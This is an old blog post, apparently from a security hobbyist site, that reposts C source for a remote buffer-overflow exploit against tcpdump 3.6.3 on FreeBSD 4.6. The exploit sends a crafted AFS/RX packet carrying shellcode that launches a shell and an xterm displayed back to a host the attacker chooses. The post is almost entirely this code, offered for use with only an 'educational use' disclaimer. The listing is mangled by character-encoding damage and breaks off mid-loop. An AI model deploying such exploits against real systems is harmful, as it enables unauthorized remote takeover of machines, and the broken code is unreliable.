tcpdump remote exploit (old)

Subscribe via feed.

tcpdump remote exploit (old)

Posted by deepquest on March 2, 2004 – 4:57 pm

old remote exploit against tcpdump.

feed the goats!

#include
??#include
??#include
??#include
??#include
??#include

??#define ADDR????????????0xbffff248
??#define OFFSET???????????0
??#define NUM_ADDR??????????10
??#define NOP???????????? 0x90
??#define NUM_NOP?????????? 100

??#define RX_CLIENT_INITIATED?? 1
??#define RX_PACKET_TYPE_DATA?? 1
??#define FS_RX_DPORT?????? 7000
??#define FS_RX_SPORT?????? 7001
??#define AFS_CALL????????134

??struct rx_header {
????u_int32_t epoch;
????u_int32_t cid;
????u_int32_t callNumber;
????u_int32_t seq;
????u_int32_t serial;
????u_char type;
????u_char flags;
????u_char userStatus;
????u_char securityIndex;
????u_short spare;
????u_short serviceId;
??};

??char shellcode[] =
???”xebx57x5exb3x21xfexcbx88x5ex2cx88x5ex23″
???”x88x5ex1fx31xdbx88x5ex07x46x46x88x5ex08″
???”x4ex4ex88x5exFFx89x5exfcx89x76xf0x8dx5e”
???”x08x89x5exf4x83xc3x03x89x5exf8x8dx4exf0″
???”x89xf3x8dx56xfcx31xc0xb0x0ex48x48x48xcd”
???”x80x31xc0x40x31xdbxcdx80xAAxAAxAAxAAxBB”
???”xBBxBBxBBxCCxCCxCCxCCxDDxDDxDDxDDxe8xa4″
???”xffxffxff”
???”/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ”;

??long resolve(char *name) {
?? struct hostent *hp;
?? long ip;

?? if ((ip=inet_addr(name))==-1) {
??? if ((hp=gethostbyname(name))==NULL) {
??????fprintf (stderr,”Can’t resolve host name [%s].n”,name);
??????exit(-1);
?????}
????memcpy(&ip,(hp->h_addr),4);
????}
?? return(ip);
??}

??int main (int argc, char *argv[]) {

?? struct sockaddr_in addr,sin;
?? int sock,aux, offset=OFFSET;
?? char buffer[4048], *chptr;
?? struct rx_header *rxh;
?? long int *lptr, return_addr=ADDR;

???fprintf(stderr,”Tcpdump 3.6.3 remote exploit against FreeBSD 4.6nn”);

???if (argc<3) { ????printf("Usage: %s [host] [display] [offset]n",argv[0]); ????exit(-1); ????} ???if (argc==4) offset=atoi(argv[3]); ???return_addr+=offset; ???fprintf(stderr,"Using return addr: %#xn",return_addr); ???addr.sin_family=AF_INET; ???addr.sin_addr.s_addr=resolve(argv[1]); ???addr.sin_port=htons(FS_RX_DPORT); ???if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) { ???? perror("socket()"); ???? exit(-1); ???? } ???sin.sin_family=AF_INET; ???sin.sin_addr.s_addr=INADDR_ANY; ???sin.sin_port=htons(FS_RX_SPORT); ???if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) { ?????perror("bind()"); ?????exit(-1); ?????} ???memset(buffer,0,sizeof(buffer)); ???rxh=(struct rx_header *)buffer; ???rxh->type=RX_PACKET_TYPE_DATA;
???rxh->seq=htonl(1);
???rxh->flags=RX_CLIENT_INITIATED;

???lptr=(long int *)(buffer+sizeof(struct rx_header));
???*(lptr++)=htonl(AFS_CALL);
???*(lptr++)=htonl(1);
???*(lptr++)=htonl(2);
???*(lptr++)=htonl(3);

???*(lptr++)=htonl(420);
???chptr=(char *)lptr;
???sprintf(chptr,”1 0n”);
???chptr+=4;

???memset(chptr,’A’,120);
???chptr+=120;
???lptr=(long int *)chptr;
???for (aux=0;aux

This post is under “Security” and has no respond so far.
If you enjoy this article, make sure you subscribe to my RSS Feed.

Post a reply

You must be logged in to post a comment.

« Boat for sale Search ASM Code Tool »

:: Deepquest ::

This site contains information which could be considered illegal in some countries. It is provided here for educational use only and is not intended to be used for illegal activities.

tcpdump remote exploit (old)

Post a reply

Tabs Switcher

Categories

Archives

Meta

BLOGROLL